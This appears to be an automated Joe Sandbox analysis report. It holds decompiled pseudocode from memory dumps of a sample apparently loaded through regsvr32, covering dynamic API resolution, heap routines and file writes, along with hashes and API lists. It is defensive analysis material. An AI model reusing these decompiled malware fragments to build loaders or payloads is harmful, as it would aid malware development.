                          				WCHAR* _t123;
                          
                          				 *((long long*)(_t105 + 8)) = __rbx;
                          				 *((long long*)(_t105 + 0x10)) = _t101;
                          				 *((long long*)(_t105 + 0x18)) = __rsi;
                          				r14d = __ecx;
                          				_t111 =  *0x8c0b3760; // 0x91a6ae42c18b
                          				_t95 = _t94 | 0xffffffff;
                          				_t89 = _t111 ^  *(0x7ff88c070000 + 0x44810 + _t121 * 8);
                          				asm("dec eax");
                          				if (_t89 == _t95) goto 0x8c07f4a1;
                          				if (_t89 == 0) goto 0x8c07f389;
                          				_t72 = _t89;
                          				goto 0x8c07f4a3;
                          				if (__r8 == __r9) goto 0x8c07f435;
                          				_t78 =  *((intOrPtr*)(0x7ff88c070000 + 0x44770 + __rsi * 8));
                          				if (_t78 == 0) goto 0x8c07f3a9;
                          				if (_t78 == _t95) goto 0x8c07f421;
                          				goto 0x8c07f41c;
                          				r8d = 0x800;
                          				LoadLibraryExW(_t123, _t121, _t118);
                          				if (_t72 != 0) goto 0x8c07f3ea;
                          				if (GetLastError() != 0x57) goto 0x8c07f3e8;
                          				r8d = 0;
                          				LoadLibraryExW(??, ??, ??);
                          				_t80 = _t72;
                          				goto 0x8c07f3ea;
                          				if (_t80 != 0) goto 0x8c07f403;
                          				 *((intOrPtr*)(0x7ff88c070000 + 0x44770 + __rsi * 8)) = _t95;
                          				goto 0x8c07f421;
                          				_t19 = 0x7ff88c070000 + 0x44770 + __rsi * 8;
                          				_t76 =  *_t19;
                          				 *_t19 = _t80;
                          				if (_t76 == 0) goto 0x8c07f41c;
                          				FreeLibrary(_t115);
                          				if (_t80 != 0) goto 0x8c07f476;
                          				if (__r8 + 4 != __r9) goto 0x8c07f392;
                          				if (_t80 == 0) goto 0x8c07f486;
                          				GetProcAddress(_t94);
                          				if (_t76 == 0) goto 0x8c07f47f;
                          				_t109 =  *0x8c0b3760; // 0x91a6ae42c18b
                          				asm("dec eax");
                          				 *(0x7ff88c070000 + 0x44810 + _t121 * 8) = _t76 ^ _t109;
                          				goto 0x8c07f4a3;
                          				goto 0x8c07f437;
                          				_t114 =  *0x8c0b3760; // 0x91a6ae42c18b
                          				asm("dec eax");
                          				 *(0x7ff88c070000 + 0x44810 + _t121 * 8) = _t95 ^ _t114;
                          				return 0;
                          			}



















                          0x7ff88c07f320
                          0x7ff88c07f325
                          0x7ff88c07f32a
                          0x7ff88c07f33c
                          0x7ff88c07f357
                          0x7ff88c07f35e
                          0x7ff88c07f368
                          0x7ff88c07f370
                          0x7ff88c07f376
                          0x7ff88c07f37f
                          0x7ff88c07f381
                          0x7ff88c07f384
                          0x7ff88c07f38c
                          0x7ff88c07f395
                          0x7ff88c07f3a0
                          0x7ff88c07f3a5
                          0x7ff88c07f3a7
                          0x7ff88c07f3b6
                          0x7ff88c07f3bc
                          0x7ff88c07f3c8
                          0x7ff88c07f3d3
                          0x7ff88c07f3d5
                          0x7ff88c07f3dd
                          0x7ff88c07f3e3
                          0x7ff88c07f3e6
                          0x7ff88c07f3f4
                          0x7ff88c07f3f9
                          0x7ff88c07f401
                          0x7ff88c07f406
                          0x7ff88c07f406
                          0x7ff88c07f406
                          0x7ff88c07f411
                          0x7ff88c07f416
                          0x7ff88c07f41f
                          0x7ff88c07f428
                          0x7ff88c07f43a
                          0x7ff88c07f442
                          0x7ff88c07f44b
                          0x7ff88c07f44d
                          0x7ff88c07f466
                          0x7ff88c07f46c
                          0x7ff88c07f474
                          0x7ff88c07f47d
                          0x7ff88c07f47f
                          0x7ff88c07f493
                          0x7ff88c07f499
                          0x7ff88c07f4bf

                          APIs
                          • GetProcAddress.KERNEL32(?,000091A6AE42C18B,00000007,00007FF88C07F647,?,?,00000000,00007FF88C07F1C7,?,?,000091A6AE42C18B,00007FF88C07E6A9), ref: 00007FF88C07F442
                          Memory Dump Source
                          • Source File: 00000003.00000002.389521559.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000003.00000002.389503061.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389771313.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389956635.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389983202.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390104358.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390153087.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff88c070000_regsvr32.jbxd
                          Similarity
                          • API ID: AddressProc
                          • String ID:
                          • API String ID: 190572456-0
                          • Opcode ID: 455019633da336f5729206dc12b9164558a1ea73cc9de17300a2dc75095f9908
                          • Instruction ID: ad442c374d198475d172c28cd7714dc872b14ccb20cb11012f1bc2924181d778
                          • Opcode Fuzzy Hash: 455019633da336f5729206dc12b9164558a1ea73cc9de17300a2dc75095f9908
                          • Instruction Fuzzy Hash: 304146A1B0EA4A82FE299B52E8142756391BF66BE0F198535DE1D4B78CEF3DE401C344
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 32%
                          			E00007FF87FF88C084EEC(void* __edx, long long __rax, long long __rbx, void* __rcx, long long* __rdx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                          				intOrPtr _v32;
                          				long long _v40;
                          				void* _t11;
                          				long long _t49;
                          
                          				_a8 = __rbx;
                          				_a16 = __rbp;
                          				_a24 = __rsi;
                          				if (__rcx != 0) goto 0x8c084f28;
                          				_t11 = E00007FF87FF88C07E6A0(__rax);
                          				 *((intOrPtr*)(__rax)) = 0x16;
                          				E00007FF87FF88C07E580(_t11);
                          				goto 0x8c084fc9;
                          				if (__rdx == 0) goto 0x8c084f11;
                          				E00007FF87FF88C07F4C0();
                          				_v32 = 0;
                          				r15d = 0;
                          				 *__rdx = _t49;
                          				r15b = 0 == 0;
                          				_v40 = _t49;
                          				r9d = r9d | 0xffffffff;
                          				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0x8c084f6f;
                          				E00007FF87FF88C07E630(GetLastError(), __rax, __rbx);
                          				goto 0x8c084f21;
                          				E00007FF87FF88C07E154(__rax, _t14 + _t14);
                          				if (__rax == 0) goto 0x8c084fbf;
                          				_v32 = r14d;
                          				r9d = r9d | 0xffffffff;
                          				_v40 = __rax;
                          				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0x8c084fb1;
                          				E00007FF87FF88C07E630(GetLastError(), __rax, __rax);
                          				goto 0x8c084fbf;
                          				 *__rdx = __rax;
                          				E00007FF87FF88C07E114(__rax, _t49);
                          				return 1;
                          			}







                          0x7ff88c084eec
                          0x7ff88c084ef1
                          0x7ff88c084ef6
                          0x7ff88c084f0f
                          0x7ff88c084f11
                          0x7ff88c084f16
                          0x7ff88c084f1c
                          0x7ff88c084f23
                          0x7ff88c084f2b
                          0x7ff88c084f2d
                          0x7ff88c084f34
                          0x7ff88c084f38
                          0x7ff88c084f3b
                          0x7ff88c084f3e
                          0x7ff88c084f42
                          0x7ff88c084f4a
                          0x7ff88c084f5e
                          0x7ff88c084f68
                          0x7ff88c084f6d
                          0x7ff88c084f75
                          0x7ff88c084f80
                          0x7ff88c084f82
                          0x7ff88c084f87
                          0x7ff88c084f8e
                          0x7ff88c084fa0
                          0x7ff88c084faa
                          0x7ff88c084faf
                          0x7ff88c084fb7
                          0x7ff88c084fc2
                          0x7ff88c084fe1

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.389521559.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000003.00000002.389503061.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389771313.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389956635.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389983202.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390104358.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390153087.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff88c070000_regsvr32.jbxd
                          Similarity
                          • API ID: ByteCharErrorLastMultiWide$AllocHeap_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 2395940807-0
                          • Opcode ID: 35dbe73a7bb461abc9f03f03902340b94bb8d2f0b9dbf59d0741637dfc6f8abb
                          • Instruction ID: 4aac6d474f6ee7f53c4b8f524053b0a6974bde5acd8e38c0170b8cae9182a301
                          • Opcode Fuzzy Hash: 35dbe73a7bb461abc9f03f03902340b94bb8d2f0b9dbf59d0741637dfc6f8abb
                          • Instruction Fuzzy Hash: E5210271A09B5245EE64AFA6EC10139A2E5BF96BD0F044534ED5D477AEEF3CE400C200
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 85%
                          			E00007FF87FF88C086400(signed int __ecx, void* __edx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
                          				signed int _t27;
                          				signed int _t28;
                          				signed int _t29;
                          				signed int _t30;
                          				signed int _t31;
                          				signed int _t43;
                          				signed int _t44;
                          				signed int _t45;
                          				signed int _t47;
                          				void* _t52;
                          
                          				_a8 = __rbx;
                          				_a16 = __rsi;
                          				_t27 = __ecx & 0x0000001f;
                          				if ((__ecx & 0x00000008) == 0) goto 0x8c086431;
                          				if (__edx >= 0) goto 0x8c086431;
                          				E00007FF87FF88C086BDC(_t27, _t52);
                          				_t28 = _t27 & 0xfffffff7;
                          				goto 0x8c086488;
                          				_t43 = 0x00000004 & dil;
                          				if (_t43 == 0) goto 0x8c08644c;
                          				asm("dec eax");
                          				if (_t43 >= 0) goto 0x8c08644c;
                          				E00007FF87FF88C086BDC(_t28, _t52);
                          				_t29 = _t28 & 0xfffffffb;
                          				goto 0x8c086488;
                          				_t44 = dil & 0x00000001;
                          				if (_t44 == 0) goto 0x8c086468;
                          				asm("dec eax");
                          				if (_t44 >= 0) goto 0x8c086468;
                          				E00007FF87FF88C086BDC(_t29, _t52);
                          				_t30 = _t29 & 0xfffffffe;
                          				goto 0x8c086488;
                          				_t45 = dil & 0x00000002;
                          				if (_t45 == 0) goto 0x8c086488;
                          				asm("dec eax");
                          				if (_t45 >= 0) goto 0x8c086488;
                          				if ((dil & 0x00000010) == 0) goto 0x8c086485;
                          				E00007FF87FF88C086BDC(_t30, _t52);
                          				_t31 = _t30 & 0xfffffffd;
                          				_t47 = dil & 0x00000010;
                          				if (_t47 == 0) goto 0x8c0864a2;
                          				asm("dec eax");
                          				if (_t47 >= 0) goto 0x8c0864a2;
                          				E00007FF87FF88C086BDC(_t31, _t52);
                          				return 0 | (_t31 & 0xffffffef) == 0x00000000;
                          			}













                          0x7ff88c086400
                          0x7ff88c086405
                          0x7ff88c086414
                          0x7ff88c08641c
                          0x7ff88c086420
                          0x7ff88c086427
                          0x7ff88c08642c
                          0x7ff88c08642f
                          0x7ff88c086436
                          0x7ff88c086439
                          0x7ff88c08643b
                          0x7ff88c086440
                          0x7ff88c086442
                          0x7ff88c086447
                          0x7ff88c08644a
                          0x7ff88c08644c
                          0x7ff88c086450
                          0x7ff88c086452
                          0x7ff88c086457
                          0x7ff88c08645e
                          0x7ff88c086463
                          0x7ff88c086466
                          0x7ff88c086468
                          0x7ff88c08646c
                          0x7ff88c08646e
                          0x7ff88c086473
                          0x7ff88c086479
                          0x7ff88c086480
                          0x7ff88c086485
                          0x7ff88c086488
                          0x7ff88c08648c
                          0x7ff88c08648e
                          0x7ff88c086493
                          0x7ff88c08649a
                          0x7ff88c0864b8

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.389521559.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000003.00000002.389503061.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389771313.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389956635.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389983202.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390104358.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390153087.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff88c070000_regsvr32.jbxd
                          Similarity
                          • API ID: _set_statfp
                          • String ID:
                          • API String ID: 1156100317-0
                          • Opcode ID: 8e204902ee3cdeb9f77a3f964fa6f85e84bca92309d804b1f408b313ac172a76
                          • Instruction ID: 9f05eccc43f1acaa2d228e4acda60c3f4aaa29cae909a08e6ab9e3b9b8ffb7ff
                          • Opcode Fuzzy Hash: 8e204902ee3cdeb9f77a3f964fa6f85e84bca92309d804b1f408b313ac172a76
                          • Instruction Fuzzy Hash: F3116D26E1861209FE781126DC8237D11C1FF573F4E4ADA34EA7E0A6DECF2CA880C211
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 16%
                          			E00007FF87FF88C084898(signed int __edx, void* __edi, void* __rax, signed long long __rbx, signed int* __rcx, long long __rbp, signed short* __r8, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed long long _a5176, void* _a5192) {
                          				intOrPtr _v0;
                          				signed long long _v8;
                          				int _t33;
                          				long _t37;
                          				void* _t38;
                          				signed int _t39;
                          				int _t48;
                          				signed long long _t60;
                          				short* _t65;
                          				signed int* _t66;
                          				void* _t82;
                          				void* _t89;
                          				void* _t95;
                          				void* _t98;
                          				void* _t101;
                          				void* _t102;
                          
                          				_a8 = __rbx;
                          				_a24 = __rbp;
                          				E00007FF87FF88C087050(_t38, __rax, __rcx, _t82, __r8, _t95, _t98);
                          				_t60 =  *0x8c0b3760; // 0x91a6ae42c18b
                          				_a5176 = _t60 ^ _t89 - __rax;
                          				r14d = r9d;
                          				r10d = r10d & 0x0000003f;
                          				_t102 = _t101 + __r8;
                          				 *__rcx =  *__rcx & 0x00000000;
                          				__rcx[1] =  *((intOrPtr*)(0x8c0b4970 + (__edx >> 6) * 8));
                          				if (__r8 - _t102 >= 0) goto 0x8c0849db;
                          				_t65 =  &_a40;
                          				if (__r8 - _t102 >= 0) goto 0x8c084943;
                          				_t39 =  *__r8 & 0x0000ffff;
                          				if (_t39 != 0xa) goto 0x8c08492f;
                          				 *_t65 = 0xd;
                          				_t66 = _t65 + 2;
                          				 *_t66 = _t39;
                          				if ( &(_t66[0]) -  &_a1744 < 0) goto 0x8c084911;
                          				_a16 = _a16 & 0x00000000;
                          				_a8 = _a8 & 0x00000000;
                          				_v0 = 0xd55;
                          				_v8 =  &_a1752;
                          				r9d = 0;
                          				_t33 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
                          				_t48 = _t33;
                          				if (_t33 == 0) goto 0x8c0849d3;
                          				if (_t33 == 0) goto 0x8c0849c3;
                          				_v8 = _v8 & 0x00000000;
                          				r8d = _t48;
                          				r8d = r8d;
                          				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8c0849d3;
                          				if (0 + _a24 - _t48 < 0) goto 0x8c084990;
                          				__rcx[1] = __edi - r15d;
                          				goto 0x8c084906;
                          				_t37 = GetLastError();
                          				 *__rcx = _t37;
                          				E00007FF87FF88C086D80();
                          				return _t37;
                          			}



















                          0x7ff88c084898
                          0x7ff88c08489d
                          0x7ff88c0848af
                          0x7ff88c0848b7
                          0x7ff88c0848c1
                          0x7ff88c0848d2
                          0x7ff88c0848e0
                          0x7ff88c0848e4
                          0x7ff88c0848fc
                          0x7ff88c0848ff
                          0x7ff88c084906
                          0x7ff88c08490c
                          0x7ff88c084914
                          0x7ff88c084916
                          0x7ff88c084921
                          0x7ff88c084928
                          0x7ff88c08492b
                          0x7ff88c08492f
                          0x7ff88c084941
                          0x7ff88c084943
                          0x7ff88c08494e
                          0x7ff88c08495c
                          0x7ff88c08496f
                          0x7ff88c084974
                          0x7ff88c08497e
                          0x7ff88c084984
                          0x7ff88c084988
                          0x7ff88c08498e
                          0x7ff88c084990
                          0x7ff88c0849a5
                          0x7ff88c0849ae
                          0x7ff88c0849b9
                          0x7ff88c0849c1
                          0x7ff88c0849c8
                          0x7ff88c0849ce
                          0x7ff88c0849d3
                          0x7ff88c0849d9
                          0x7ff88c0849e9
                          0x7ff88c084a09

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.389521559.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000003.00000002.389503061.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389771313.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389956635.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389983202.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390104358.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390153087.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff88c070000_regsvr32.jbxd
                          Similarity
                          • API ID: ByteCharErrorFileLastMultiWideWrite
                          • String ID: U
                          • API String ID: 2456169464-4171548499
                          • Opcode ID: a2d3cb67cfcf3dc513eb76f03ce482a2aef41a2ff1dbddf9374cbcdbadebe864
                          • Instruction ID: 8fa2b08fffa43b06e5ecaa749f1964bd7c446f61c31b3704f87496a2bbdd7127
                          • Opcode Fuzzy Hash: a2d3cb67cfcf3dc513eb76f03ce482a2aef41a2ff1dbddf9374cbcdbadebe864
                          • Instruction Fuzzy Hash: DD41A222B19A4182EB708F66E8553AA77A0FB897D4F408131EE8D8779CDF3CD505CB44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 22%
                          			E003DA238(void* __ecx, void* __edx, void* __ebp, long long __rbx, void* __rcx, void* __rdx, long long __r8, void* _a8, long long* _a24, char _a32) {
                          				char _v72;
                          				char _v80;
                          				char _v88;
                          				long long _v104;
                          				void* __rdi;
                          				void* __rsi;
                          				void* __rbp;
                          				void* _t33;
                          				void* _t37;
                          				intOrPtr _t40;
                          				void* _t43;
                          				void* _t49;
                          				intOrPtr _t61;
                          				void* _t65;
                          				long long* _t78;
                          				long long _t79;
                          				long long _t80;
                          				void* _t92;
                          				intOrPtr _t104;
                          				void* _t105;
                          				intOrPtr _t107;
                          				void* _t108;
                          				long long* _t110;
                          				intOrPtr _t112;
                          				long long* _t114;
                          				void* _t129;
                          
                          				_t80 = __rbx;
                          				_t51 = __ecx;
                          				_t78 = _t114;
                          				 *((long long*)(_t78 + 8)) = __rbx;
                          				 *((long long*)(_t78 + 0x18)) = __r8;
                          				_push(_t108);
                          				_push(_t105);
                          				_t126 =  *0x3dd458;
                          				_t3 = _t78 + 0x20; // 0xfb849fa7
                          				_t112 =  *((intOrPtr*)( *0x3dd458 + 8));
                          				_t129 = __rcx;
                          				_t49 = 8;
                          				_t33 = E003D24B0(__ecx, _t65, __rbx, _t3, _t108, __r8);
                          				if(_t78 == 0) {
                          					L18:
                          					return _t49;
                          				}
                          				E003D908C(_t33, 0xfb849f8f,  *((intOrPtr*)(_t126 + 0x18)));
                          				if(_t78 == 0) {
                          					__eflags = 0;
                          					_v88 = 0;
                          				} else {
                          					_v88 =  *_t78();
                          				}
                          				_t10 = _t78 + 1; // 0x1
                          				r8d = _t105 + _t10;
                          				_t37 = HeapAlloc(??, ??, ??);
                          				_t110 = _t78;
                          				_v80 = _t78;
                          				if(_t78 == 0) {
                          					L17:
                          					HeapFree();
                          					goto L18;
                          				} else {
                          					L003D47B0();
                          					_t13 = _t105 + 1; // 0x1
                          					r8d = _t13;
                          					L003D47B0();
                          					E003D908C(_t37, 0xfb849f8f,  *((intOrPtr*)(_t126 + 0x18)));
                          					if(_t78 == 0) {
                          						_t40 = 0;
                          						__eflags = 0;
                          					} else {
                          						_t40 =  *_t78();
                          					}
                          					_t16 =  &_a32; // 0xfb84a007
                          					_t17 =  &_v72; // 0xfb849f9f
                          					r8d = _t40;
                          					_v104 = _t16;
                          					_t49 = E003D7CF4(_t51, _t78, _t80, _t129, _t110, _t112, _t17);
                          					HeapFree(??, ??, ??);
                          					_t70 = _t49;
                          					if(_t49 != 0) {
                          						goto L17;
                          					} else {
                          						r8d = _a32;
                          						_t104 = _v72;
                          						_t21 =  &_v88; // 0xfb849f8f
                          						_t79 = _t21;
                          						_t22 =  &_v80; // 0xfb849f87
                          						_t92 = _t129;
                          						_v104 = _t79;
                          						_t43 = E003D52B8(_t70, _t80, _t104, _t110, _t112, _t22);
                          						_t52 = _v88;
                          						_t107 = _v80;
                          						_t49 = _t43;
                          						if(_v88 == 0) {
                          							L12:
                          							 *((char*)(_t79 + _t107)) = 0;
                          							if(_t49 == 0) {
                          								E003D7500(_t52, _t80, _t107, _t107, _t110, _t112);
                          								if(_t79 != 0) {
                          									 *_a24 = _t79;
                          								} else {
                          									_t29 = _t79 + 8; // 0x8
                          									_t49 = _t29;
                          								}
                          							}
                          							HeapFree();
                          							HeapFree(??, ??, ??);
                          							goto L17;
                          						} else {
                          							goto L10;
                          						}
                          						while(1) {
                          							L10:
                          							_t61 = _t92 - 1;
                          							if( *((char*)(_t104 + _t107)) != 0x3d) {
                          								goto L12;
                          							}
                          							_t52 = _t61;
                          							if(_t61 != 0) {
                          								continue;
                          							}
                          							goto L12;
                          						}
                          						goto L12;
                          					}
                          				}
                          			}





























                          0x003da238
                          0x003da238
                          0x003da238
                          0x003da23b
                          0x003da23f
                          0x003da244
                          0x003da245
                          0x003da252
                          0x003da25c
                          0x003da260
                          0x003da265
                          0x003da268
                          0x003da26d
                          0x003da278
                          0x003da3dc
                          0x003da3f5
                          0x003da3f5
                          0x003da288
                          0x003da290
                          0x003da29f
                          0x003da2a1
                          0x003da292
                          0x003da299
                          0x003da299
                          0x003da2b1
                          0x003da2b1
                          0x003da2b6
                          0x003da2bc
                          0x003da2bf
                          0x003da2c7
                          0x003da3ce
                          0x003da3d6
                          0x00000000
                          0x003da2cd
                          0x003da2dd
                          0x003da2e2
                          0x003da2e2
                          0x003da2ed
                          0x003da2fc
                          0x003da304
                          0x003da30d
                          0x003da30d
                          0x003da306
                          0x003da309
                          0x003da309
                          0x003da30f
                          0x003da317
                          0x003da31c
                          0x003da31f
                          0x003da337
                          0x003da339
                          0x003da33f
                          0x003da341
                          0x00000000
                          0x003da347
                          0x003da347
                          0x003da34f
                          0x003da354
                          0x003da354
                          0x003da359
                          0x003da35e
                          0x003da361
                          0x003da366
                          0x003da36b
                          0x003da36f
                          0x003da374
                          0x003da378
                          0x003da389
                          0x003da38b
                          0x003da391
                          0x003da396
                          0x003da39e
                          0x003da3ad
                          0x003da3a0
                          0x003da3a0
                          0x003da3a0
                          0x003da3a0
                          0x003da39e
                          0x003da3b8
                          0x003da3c8
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x003da37a
                          0x003da37a
                          0x003da37a
                          0x003da381
                          0x00000000
                          0x00000000
                          0x003da383
                          0x003da387
                          0x00000000
                          0x00000000
                          0x00000000
                          0x003da387
                          0x00000000
                          0x003da37a
                          0x003da341

                          APIs
                            • Part of subcall function 003D24B0: HeapAlloc.KERNEL32 ref: 003D2572
                            • Part of subcall function 003D24B0: HeapFree.KERNEL32 ref: 003D25A9
                            • Part of subcall function 003D24B0: HeapFree.KERNEL32 ref: 003D25B7
                            • Part of subcall function 003D908C: SetLastError.KERNEL32 ref: 003D90C8
                          • HeapAlloc.KERNEL32 ref: 003DA2B6
                          • HeapFree.KERNEL32 ref: 003DA339
                          • HeapFree.KERNEL32 ref: 003DA3B8
                          • HeapFree.KERNEL32 ref: 003DA3C8
                          • HeapFree.KERNEL32 ref: 003DA3D6
                          Memory Dump Source
                          • Source File: 00000003.00000002.389034131.00000000003D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_3d0000_regsvr32.jbxd
                          Similarity
                          • API ID: Heap$Free$Alloc$ErrorLast
                          • String ID:
                          • API String ID: 1659099196-0
                          • Opcode ID: ebec7e3ced01d3e53c95a68bcdc967b9fa3e31920521932be2b83d349f2b3dc9
                          • Instruction ID: 50bd2c79770980b5fd6504128bf2228dede9a75057d28789e1de2b3035bb9f2b
                          • Opcode Fuzzy Hash: ebec7e3ced01d3e53c95a68bcdc967b9fa3e31920521932be2b83d349f2b3dc9
                          • Instruction Fuzzy Hash: C9419037315B818AEB56DB66B54075AB7A6FBC9BC4F048026AE4E47704EF38C505C700
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 40%
                          			E003D2DC4(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __ebp, void* __esp, void* __eflags, void* __rcx, long long __rdx, long long __r8, void* __r9, int _a8, signed long long _a16, int* _a24, signed int _a32) {
                          				intOrPtr _v88;
                          				void* _v96;
                          				signed int _v104;
                          				signed long long _v112;
                          				signed int _v120;
                          				long long _v128;
                          				signed long long _v136;
                          				void* __rbx;
                          				void* __rdi;
                          				void* __rsi;
                          				void* __rbp;
                          				void* _t70;
                          				int _t74;
                          				void* _t75;
                          				signed int _t87;
                          				int _t88;
                          				signed int _t90;
                          				int _t92;
                          				signed int _t93;
                          				void* _t109;
                          				void* _t111;
                          				void* _t112;
                          				signed long long _t134;
                          				void* _t137;
                          				void* _t164;
                          				signed int _t166;
                          				void* _t168;
                          				void* _t170;
                          				void* _t182;
                          				void* _t183;
                          				signed int* _t187;
                          				signed int _t188;
                          				signed long long _t194;
                          
                          				_t112 = __esp;
                          				_t111 = __ebp;
                          				_t110 = __esi;
                          				_t109 = __edi;
                          				_t183 = _t170;
                          				 *((long long*)(_t183 + 0x18)) = __r8;
                          				 *((long long*)(_t183 + 0x10)) = __rdx;
                          				_push(_t137);
                          				_push(_t168);
                          				_push(_t166);
                          				_push(_t194);
                          				_t192 =  *0x3dd458;
                          				 *(_t183 + 0x20) =  *(_t183 + 0x20) & 0x00000000;
                          				_t164 = __rcx;
                          				_t95 =  *0x3dd450;
                          				_t134 =  *((intOrPtr*)( *0x3dd458 + 8));
                          				_v120 =  *0x3dd450;
                          				r15d = 0;
                          				 *(_t183 - 0x60) =  *(_t183 - 0x60) & _t194;
                          				_v112 = _t134;
                          				if(E003D4320(_t70,  *0x3dd450, __edx, __esi, __eflags, _t137, __rcx, _t183 - 0x68, __rcx, _t166, __r9) == 0) {
                          					_t166 = _v104;
                          					r12d = 2;
                          				} else {
                          					_t110 = 0;
                          					_t12 = _t194 + 1; // 0x1
                          					r12d = _t12;
                          					_v104 = _t166;
                          				}
                          				_t15 =  &_a32; // 0xca
                          				_t181 = _t15;
                          				_t175 =  &_v96;
                          				_t97 = r12d;
                          				_t72 = E003D4880(_t95, r12d, _t110, _t134, _t137, _t164,  &_v96, _t15);
                          				_t92 = _t72;
                          				if(_t72 != 0) {
                          					L15:
                          					__eflags = _t92 - 0x10d2;
                          					if(_t92 == 0x10d2) {
                          						goto L20;
                          					}
                          					_t48 = _t164 + 0xc0; // 0xc0
                          					__eflags = 0;
                          					_t72 = E003D47B8(_t92, _t95, 0, _t134, _t137, _t48, _t168);
                          					goto L17;
                          				} else {
                          					r8d = _a32;
                          					r13d = r8d;
                          					r13d = r13d - r12d;
                          					_t187 = _v96;
                          					if(_t166 != 0) {
                          						_t90 = _a8;
                          						_t187[0xa] = 1;
                          						_t187[0x12] = _t166;
                          						_t187[0xd] = _t90;
                          						_t187[0x10] = _t90;
                          					}
                          					_t25 = _t164 + 0xc0; // 0xc0
                          					r9d = 0;
                          					_t161 = _t187;
                          					 *_t187 = _v120 ^ 0x62ade362;
                          					_t187[3] =  *(_t164 + 0x48);
                          					_t187[2] =  *(_t164 + 0x4c);
                          					_t30 =  &_a8; // 0xb2
                          					_v128 = _t30;
                          					_t32 =  &_v120; // 0x32
                          					_t134 = _t32;
                          					_v136 = _t134;
                          					_t92 = E003D1BFC(_t92, _t95, _t97, _t109, _t110, _t111, _t112, _t134, _t137, _t25, _t187, _t175, _t181, _t183);
                          					_t72 = HeapFree(??, ??, ??);
                          					if(r13d != 0 && (_t92 == 0 || _t92 == 0x10d2)) {
                          						_t72 = E003DA3F8(_t134, _t137, _t164, _t161, _t166, _t168);
                          					}
                          					if(_t92 != 0) {
                          						goto L15;
                          					}
                          					_t93 = _a8;
                          					_t188 = _v120;
                          					r13d =  *(_t164 + 0x4c);
                          					_t87 = E003D6C1C(_t93, _t134, _t188);
                          					_t38 =  &_a8; // 0xb2
                          					r9d = 1;
                          					 *(_t164 + 0x48) = _t93;
                          					 *(_t164 + 0x4c) = _t87;
                          					_t88 = E003D7B6C(_t93, _t95, _t93, _t109, _t110, _t111, _t137, _t164, _t188, _t166, _t168, _t38, _t182, _t183);
